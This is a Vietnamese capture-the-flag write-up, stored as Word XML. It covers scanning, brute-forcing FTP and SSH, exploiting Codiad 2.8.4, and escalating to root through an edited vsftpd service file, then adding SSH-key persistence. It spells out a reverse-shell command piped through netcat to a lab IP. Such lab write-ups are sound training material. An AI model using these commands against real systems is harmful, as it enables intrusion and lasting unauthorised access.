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AC3C7" w14:textId="76790459" w:rsidR="00BD2179" w:rsidRDefault="008D4750">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17C20E2D" wp14:editId="65FDC135">
            <wp:extent cx="5943600" cy="1573530"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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0CC" w14:textId="04ABED32" w:rsidR="008D4750" w:rsidRDefault="008D4750">
      <w:r>
        <w:t>1 room khá hay! Bắt đầu thôi nào. Let’s go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B75641" w14:textId="52D6B5C2" w:rsidR="005D5C4B" w:rsidRDefault="005D5C4B" w:rsidP="005D5C4B">
      <w:r>
        <w:t>1.Dò quét</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71B8C9" w14:textId="20193CC6" w:rsidR="00F30ADF" w:rsidRDefault="00F30ADF" w:rsidP="005D5C4B">
      <w:r w:rsidRPr="00F30ADF">
        <w:t>nmap -sC -sV -v 10.10.195.25 -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD0453" w14:textId="2E61EA99" w:rsidR="005D5C4B" w:rsidRDefault="005D5C4B" w:rsidP="005D5C4B">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009B0D3" w14:textId="051B347B" w:rsidR="005D5C4B" w:rsidRDefault="009F0C65" w:rsidP="005D5C4B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB8F43F" wp14:editId="479D0DBE">
            <wp:extent cx="5943600" cy="4641215"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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188F" w14:textId="29F2D924" w:rsidR="005D5C4B" w:rsidRDefault="005D5C4B" w:rsidP="005D5C4B">
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00577945">
        <w:t>cổng n</w:t>
      </w:r>
      <w:r w:rsidR="00BC7C6C">
        <w:t>ày</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khá quen thuộc ftp, ssh, http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C841E79" w14:textId="69AE730A" w:rsidR="005D5C4B" w:rsidRDefault="00C45E1D" w:rsidP="005D5C4B">
      <w:r>
        <w:t>2. Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64804808" w14:textId="216E561E" w:rsidR="00C45E1D" w:rsidRDefault="00C45E1D" w:rsidP="005D5C4B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>FTP Anonymous Login với credentials là anonymous:anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EA8355" w14:textId="304E9A82" w:rsidR="00C45E1D" w:rsidRDefault="00C45E1D" w:rsidP="005D5C4B">
      <w:r>
        <w:t>Ở đây người ta dấu thư mục khá kỹ =))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A4378" w14:textId="4C9E69FC" w:rsidR="00C45E1D" w:rsidRDefault="00C45E1D" w:rsidP="005D5C4B">
      <w:r>
        <w:t>Sau khi tải file “-“ thành công chúng ta đổi tên file này. Trong trường hợp này mk đổi thành “test”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454CB4D" w14:textId="44C1406F" w:rsidR="00C45E1D" w:rsidRDefault="00C45E1D" w:rsidP="005D5C4B">
      <w:r>
        <w:t>Đọc file “test” có nhiều điểm đáng nghi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1AA55" w14:textId="52365D3D" w:rsidR="00C45E1D" w:rsidRDefault="00C45E1D" w:rsidP="005D5C4B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09360C0A" wp14:editId="733EFB2A">
            <wp:extent cx="5943600" cy="9404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BB51" w14:textId="322BB3C9" w:rsidR="00C45E1D" w:rsidRDefault="004D3D2C" w:rsidP="005D5C4B">
      <w:r>
        <w:t>Có 2 username là “john” và “drac”</w:t>
      </w:r>
      <w:r w:rsidR="00524B9D">
        <w:t>. Thông tin này cho biết password của “john” ở dạng mặc định =&gt; liên tưởng ngay tới các password dễ như: admin, password, root,…… Bruteforce nếu cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FAD41A" w14:textId="3F089153" w:rsidR="00C45E1D" w:rsidRDefault="00C45E1D" w:rsidP="005D5C4B">
      <w:r>
        <w:t>Đây là bước ở trước đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F407DBA" w14:textId="6F51DDF0" w:rsidR="00C45E1D" w:rsidRDefault="00C45E1D" w:rsidP="009F0C65">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B53BD13" wp14:editId="49D4CB55">
            <wp:extent cx="4274820" cy="4234172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251" cy="426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20C5" w14:textId="4FBE2485" w:rsidR="00DC4529" w:rsidRDefault="00DC4529" w:rsidP="00DC4529">
      <w:r>
        <w:t>Ở đây mk quyết định bruteforce ftp với wordlist hay dùng là rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8BD45D" w14:textId="038955CC" w:rsidR="0004718F" w:rsidRDefault="0004718F" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66DE669A" wp14:editId="3ED0E04C">
            <wp:extent cx="5943600" cy="605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2563" w14:textId="348F8EF6" w:rsidR="0004718F" w:rsidRDefault="0004718F" w:rsidP="00DC4529">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ngồi 1 hồi lâu vẫn ko thấy kết quả gì. “Chờ em đến hoa cũng tàn”!. Chuyển qua bruteforce ssh xem sao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C414C" w14:textId="369B5E12" w:rsidR="0004718F" w:rsidRDefault="0004718F" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DB85BFF" wp14:editId="37E7119C">
            <wp:extent cx="5943600" cy="586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A9A3" w14:textId="4521C3E1" w:rsidR="0004718F" w:rsidRDefault="0004718F" w:rsidP="00DC4529">
      <w:r>
        <w:t>Ngồi nãy giờ vẫn chưa thấy động tĩnh gì. Hmm. Có khi nào là login page trên web? Kiểm tra port 80 xem có gì ko.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD2416" w14:textId="4552B734" w:rsidR="0004718F" w:rsidRDefault="00AE701A" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792DFB40" wp14:editId="6B55600D">
            <wp:extent cx="5943600" cy="303784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F3FB" w14:textId="4182A60B" w:rsidR="00AE701A" w:rsidRDefault="00AE701A" w:rsidP="00DC4529">
      <w:r>
        <w:t>Nothing =)). À đúng rồi, quên mất “</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE701A">
        <w:t>please take care of the image file</w:t>
      </w:r>
      <w:r>
        <w:t>”. Kiểm tra xem có file ảnh nào ko.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C28C79E" w14:textId="2A0FC731" w:rsidR="00AE701A" w:rsidRDefault="00BF5997" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="242999EF" wp14:editId="39EBE728">
            <wp:extent cx="5943600" cy="283527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7E97" w14:textId="58F11237" w:rsidR="00BF5997" w:rsidRDefault="00BF5997" w:rsidP="00DC4529">
      <w:r>
        <w:t>Nothing tiếp rồi. Hmm. Cả ssh, ftp để ko bruteforce được, có khi nào bị dính “rabbit hole”. Giải lao 1 chút.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354B3A7" w14:textId="035CDE2E" w:rsidR="00BF5997" w:rsidRDefault="00BF5997" w:rsidP="00DC4529">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Khả năng mk quét thiếu cổng nào đó chẳng. Kiểm tra lại phát cho chắc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC44B9A" w14:textId="1206FAF0" w:rsidR="00BF5997" w:rsidRDefault="00BF5997" w:rsidP="00DC4529">
      <w:r w:rsidRPr="00BF5997">
        <w:t>rustscan -b 500 -a 10.10.195.25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D58FB2" w14:textId="1CD60482" w:rsidR="00BF5997" w:rsidRDefault="00BF5997" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11440471" wp14:editId="796B1A1F">
            <wp:extent cx="4086225" cy="118110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2C5" w14:textId="7934895F" w:rsidR="00BF5997" w:rsidRDefault="00BF5997" w:rsidP="00DC4529">
      <w:r>
        <w:t>Ôi thôi, đúng là thiếu 1 cổng. Kiểm tra xem nó chạy dịch vụ gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F86FEB7" w14:textId="5D12C88E" w:rsidR="00BF5997" w:rsidRDefault="00EF0D42" w:rsidP="00DC4529">
      <w:r w:rsidRPr="00EF0D42">
        <w:t>nmap -p 62337 -sC -sV -v 10.10.195.25 -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66672B6D" w14:textId="34A4C5AE" w:rsidR="00BF5997" w:rsidRDefault="00BF5997" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A197E0" wp14:editId="0B3B3387">
            <wp:extent cx="5943600" cy="1364615"/>
            <wp:effectExtent l="0" t="0" r="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72BD" w14:textId="7724A725" w:rsidR="00EF0D42" w:rsidRDefault="00EF0D42" w:rsidP="00DC4529">
      <w:r>
        <w:t xml:space="preserve">Thì ra nó ở đây. Bước đầu làm thiếu làm cho mấy bước sau cũng chệch luôn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D208A" w14:textId="6C2167A5" w:rsidR="00EF0D42" w:rsidRDefault="00EF0D42" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60325AFF" wp14:editId="281C98DF">
            <wp:extent cx="5943600" cy="223774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0D77" w14:textId="3C1AD7C1" w:rsidR="00EF0D42" w:rsidRDefault="00EF0D42" w:rsidP="00DC4529">
      <w:r>
        <w:t>CMS sử dụng là Codiad 2.8.4. Login thử với username john và password như: admin, root, password…..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3E1ED" w14:textId="62D96696" w:rsidR="006F013D" w:rsidRDefault="006F013D" w:rsidP="00DC4529">
      <w:r>
        <w:t xml:space="preserve">Mk tìm được password là password =)). </w:t>
      </w:r>
      <w:r w:rsidR="00FD3066">
        <w:t>Kiểm tra xem Codiad 2.8.4 này có lỗi gì ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494176B6" w14:textId="17815603" w:rsidR="00FD3066" w:rsidRDefault="00FD3066" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="167A2DB4" wp14:editId="753BF05F">
            <wp:extent cx="5943600" cy="2721610"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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156" w14:textId="4DB26188" w:rsidR="00FD3066" w:rsidRDefault="00FD3066" w:rsidP="00DC4529">
      <w:r>
        <w:t>RCE (Authenticated)</w:t>
      </w:r>
      <w:r w:rsidR="007C2CE7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">download mã khai thác về. </w:t>
      </w:r>
      <w:r w:rsidR="009835A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52C4EF7A" wp14:editId="3D2E9A57">
            <wp:extent cx="5943600" cy="367030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76C2" w14:textId="6C36292B" w:rsidR="009835A7" w:rsidRDefault="009835A7" w:rsidP="00DC4529">
      <w:r>
        <w:t>Đây chính là mã khai thác viết bằng Python 3. Chạy đoạn mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6745D1AA" w14:textId="3885747B" w:rsidR="009835A7" w:rsidRDefault="009835A7" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72D26746" wp14:editId="1B8DEE45">
            <wp:extent cx="5943600" cy="711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9C51" w14:textId="6AEE0D1D" w:rsidR="002750FA" w:rsidRDefault="009835A7" w:rsidP="00DC4529">
      <w:r>
        <w:t>Trước khi bấm “Y” chúng ta phải chạy 2 lệnh đồng thời</w:t>
      </w:r>
      <w:r w:rsidR="002B4004">
        <w:t xml:space="preserve"> này trước</w:t>
      </w:r>
      <w:r w:rsidR="002750FA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222F030" w14:textId="3E3E9F25" w:rsidR="00FD3066" w:rsidRDefault="009835A7" w:rsidP="00DC4529">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009835A7">
        <w:t>echo 'bash -c "bash -i &gt;/dev/tcp/10.8.231.56/4445 0&gt;&amp;1 2&gt;&amp;1"' | nc -lnvp 4444</w:t>
      </w:r>
      <w:r>
        <w:t>” và “</w:t>
      </w:r>
      <w:r w:rsidRPr="009835A7">
        <w:t>nc -lnvp 4445</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C22F7" w14:textId="78A6B06B" w:rsidR="002750FA" w:rsidRDefault="00BD3331" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB1851E" wp14:editId="1EAD47C2">
            <wp:extent cx="5943600" cy="123888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FBFF" w14:textId="7061CD63" w:rsidR="00BD3331" w:rsidRDefault="00BD3331" w:rsidP="00DC4529">
      <w:r>
        <w:t>Sau khi chạy 2 lệnh trên xong bấm “Y” để lấy shell. Đây là kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73114859" w14:textId="78845599" w:rsidR="00BD3331" w:rsidRDefault="00BD3331" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F9683A3" wp14:editId="127F9BC2">
            <wp:extent cx="5943600" cy="1064260"/>
            <wp:effectExtent l="0" t="0" r="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B550" w14:textId="729973D3" w:rsidR="00135DBA" w:rsidRDefault="00135DBA" w:rsidP="00DC4529">
      <w:r>
        <w:t>3. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FD585F" w14:textId="29827B1B" w:rsidR="00135DBA" w:rsidRDefault="00135DBA" w:rsidP="00DC4529">
      <w:r>
        <w:t>Sau 1 thôi 1 hồi tìm trong thư mục /var/www/html/codiad nhưng ko thấy file nào chứa password để connect đến db rồi đến thư mục /opt cũng ko có gì. Mk quyết định đến thư mục /home thì thấy có file .bash_history của user drac có chứa password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB9807F" w14:textId="04BCE66F" w:rsidR="007C3158" w:rsidRDefault="007C3158" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BBE9775" wp14:editId="59C564E7">
            <wp:extent cx="4267200" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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F51B" w14:textId="4726C1B4" w:rsidR="007C3158" w:rsidRDefault="007C3158" w:rsidP="00DC4529">
      <w:r>
        <w:t>Sử dụng password này để login ở dịch vụ ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E1E00C" w14:textId="7DE911F5" w:rsidR="007C3158" w:rsidRDefault="007C3158" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A15AE08" wp14:editId="480188C7">
            <wp:extent cx="4259580" cy="3126740"/>
            <wp:effectExtent l="0" t="0" r="762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691" cy="31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AD8F" w14:textId="0FEC2957" w:rsidR="00BD3331" w:rsidRDefault="007C3158" w:rsidP="00DC4529">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Số 1 – phải kiểm tra sudo permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FAB303" w14:textId="7805E049" w:rsidR="007C3158" w:rsidRDefault="007C3158" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F1647D6" wp14:editId="2C669F9C">
            <wp:extent cx="5943600" cy="7035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4EB4" w14:textId="4041E8E9" w:rsidR="007C3158" w:rsidRDefault="007C3158" w:rsidP="00DC4529">
      <w:r>
        <w:t xml:space="preserve">Chúng ta sẽ chiếm quyền root thông qua dịch vụ ftp này. Trước tiên chạy linpeas xem có phát hiện ra thêm gì </w:t>
      </w:r>
      <w:r w:rsidR="00704D94">
        <w:t>để hỗ trợ ko.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90FE9F" w14:textId="1B4F44C0" w:rsidR="009D0E28" w:rsidRDefault="009D0E28" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337FCB90" wp14:editId="7A5B4ABE">
            <wp:extent cx="5943600" cy="607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389D" w14:textId="72630354" w:rsidR="009D0E28" w:rsidRDefault="009D0E28" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4E2B24" wp14:editId="3F426D2C">
            <wp:extent cx="5943600" cy="830580"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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9F41" w14:textId="5111FCF5" w:rsidR="009D0E28" w:rsidRDefault="009D0E28" w:rsidP="00DC4529">
      <w:r>
        <w:t xml:space="preserve">2 phát  hiện vô cùng quan trọng là user “drac” này nằm trong group “sudo” và chúng ta có quyền sửa file cấu hình của dịch vụ vsftpd. =&gt; chúng ta sẽ chèn mã độc mà file </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0E28">
        <w:t>/etc/systemd/system/multi-user.target.wants/vsftpd.service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38960B6F" w14:textId="342E6C20" w:rsidR="009D0E28" w:rsidRDefault="009D0E28" w:rsidP="00DC4529">
      <w:r>
        <w:t xml:space="preserve">Đây là file </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0E28">
        <w:t>/etc/systemd/system/multi-user.target.wants/vsftpd.service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ban đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B74FF" w14:textId="73F6D2ED" w:rsidR="009D0E28" w:rsidRDefault="009D0E28" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E29CD2D" wp14:editId="70550D58">
            <wp:extent cx="5943600" cy="132461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BCFD" w14:textId="4B9F697B" w:rsidR="009D0E28" w:rsidRDefault="009D0E28" w:rsidP="00DC4529">
      <w:r>
        <w:t>Sửa lại chút:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E8427" w14:textId="4D1D72C2" w:rsidR="009D0E28" w:rsidRDefault="003969B5" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="632317D1" wp14:editId="741462C1">
            <wp:extent cx="5943600" cy="191008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6500" w14:textId="65D8B373" w:rsidR="003969B5" w:rsidRDefault="003969B5" w:rsidP="00DC4529">
      <w:r>
        <w:t>Sau khi sửa file như thế này rồi, chúng ta chạy lệnh “</w:t>
      </w:r>
      <w:r w:rsidRPr="003969B5">
        <w:t>systemctl daemon-reload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456927A1" w14:textId="61C9C738" w:rsidR="003969B5" w:rsidRDefault="003969B5" w:rsidP="00DC4529">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Rồi đoạn thú vị nhất đây “</w:t>
      </w:r>
      <w:r w:rsidRPr="003969B5">
        <w:t>sudo /usr/sbin/service vsftpd restart</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC8BBC" w14:textId="2E860F90" w:rsidR="003969B5" w:rsidRDefault="003969B5" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1625D21B" wp14:editId="372C0344">
            <wp:extent cx="5943600" cy="1516380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C234" w14:textId="260FDD6E" w:rsidR="003969B5" w:rsidRDefault="003969B5" w:rsidP="00DC4529">
      <w:r>
        <w:t xml:space="preserve">Lúc này tệp /bin/bash </w:t>
      </w:r>
      <w:r w:rsidR="00C5432D">
        <w:t xml:space="preserve">đã thành 1 tệp SUID. Để lấy quyền root chỉ cần chạy lệnh: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE84A6" w14:textId="78755528" w:rsidR="00C5432D" w:rsidRDefault="00C5432D" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E12510" wp14:editId="40578425">
            <wp:extent cx="3457575" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="9525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D7F1" w14:textId="4C1404D1" w:rsidR="00C5432D" w:rsidRDefault="00C5432D" w:rsidP="00DC4529">
      <w:r>
        <w:t>Chiếm quyền root thành công!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3709A730" w14:textId="48E01A2B" w:rsidR="00D101C3" w:rsidRDefault="00D101C3" w:rsidP="00DC4529">
      <w:r>
        <w:t>*Bonus: Persistence 1 chút cho vui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858C46D" w14:textId="2D952C5D" w:rsidR="00D101C3" w:rsidRDefault="00D101C3" w:rsidP="00DC4529">
      <w:r>
        <w:t>Tạo id_rsa key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3B763" w14:textId="446D39AB" w:rsidR="00D101C3" w:rsidRDefault="00D101C3" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="219B117A" wp14:editId="0F3E4ED0">
            <wp:extent cx="5943600" cy="1973580"/>
            <wp:effectExtent l="0" t="0" r="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C481" w14:textId="2563FA07" w:rsidR="00030AF1" w:rsidRPr="00030AF1" w:rsidRDefault="00D101C3" w:rsidP="00030AF1">
      <w:r>
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
      <w:r w:rsidR="000F6F79">
        <w:t xml:space="preserve">nội dung file </w:t>
      </w:r>
      <w:r>
        <w:t>id_rsa.pub rồi chúng ta ném vào file authorized_keys của thư mục /root/.ssh/</w:t>
      </w:r>
      <w:r w:rsidR="0008725B">
        <w:t xml:space="preserve"> trên máy của victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D469E3" w14:textId="755FA895" w:rsidR="002750FA" w:rsidRDefault="00B33047" w:rsidP="00DC4529">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A896E58" wp14:editId="3F5A0FA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781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30AF1">
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidR="00697F61">
        <w:t>Sau đó: chmod 600 id_rsa =&gt; để ssh có thể đọc được file id_rsa này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D355A9" w14:textId="3158CD3B" w:rsidR="00697F61" w:rsidRDefault="00697F61" w:rsidP="00DC4529">
      <w:r>
        <w:t>Login thôi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10236C" w14:textId="64624393" w:rsidR="009F0C65" w:rsidRDefault="00030AF1" w:rsidP="009F0C65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="275A3C59" wp14:editId="4896E00D">
            <wp:extent cx="5943600" cy="2735580"/>
            <wp:effectExtent l="0" t="0" r="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3938" w14:textId="3D4664CD" w:rsidR="00030AF1" w:rsidRDefault="00030AF1" w:rsidP="009F0C65">
      <w:r>
        <w:t>Bùm. Mission completed!!!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00030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B09C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FBE7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217D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4DA8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F7636E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5080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81E"/>
    <w:rsid w:val="00030AF1"/>
    <w:rsid w:val="0004718F"/>
    <w:rsid w:val="0008725B"/>
    <w:rsid w:val="000F6F79"/>
    <w:rsid w:val="00135DBA"/>
    <w:rsid w:val="002750FA"/>
    <w:rsid w:val="002B4004"/>
    <w:rsid w:val="003969B5"/>
    <w:rsid w:val="004D3D2C"/>
    <w:rsid w:val="00524B9D"/>
    <w:rsid w:val="00577945"/>
    <w:rsid w:val="005D5C4B"/>
    <w:rsid w:val="00697F61"/>
    <w:rsid w:val="006F013D"/>
    <w:rsid w:val="00704D94"/>
    <w:rsid w:val="007C2CE7"/>
    <w:rsid w:val="007C3158"/>
    <w:rsid w:val="008D4750"/>
    <w:rsid w:val="0095381E"/>
    <w:rsid w:val="009835A7"/>
    <w:rsid w:val="009D0E28"/>
    <w:rsid w:val="009F0C65"/>
    <w:rsid w:val="00AE701A"/>
    <w:rsid w:val="00B33047"/>
    <w:rsid w:val="00BC7C6C"/>
    <w:rsid w:val="00BD2179"/>
    <w:rsid w:val="00BD3331"/>
    <w:rsid w:val="00BF5997"/>
    <w:rsid w:val="00C45E1D"/>
    <w:rsid w:val="00C5432D"/>
    <w:rsid w:val="00D101C3"/>
    <w:rsid w:val="00DC4529"/>
    <w:rsid w:val="00EF0D42"/>
    <w:rsid w:val="00F30ADF"/>
    <w:rsid w:val="00FD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A02C4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{56015033-5626-4788-9FF3-19C7930A5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C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daodat0911@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>daodat0911@gmail.com</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-04T09:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-04T10:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>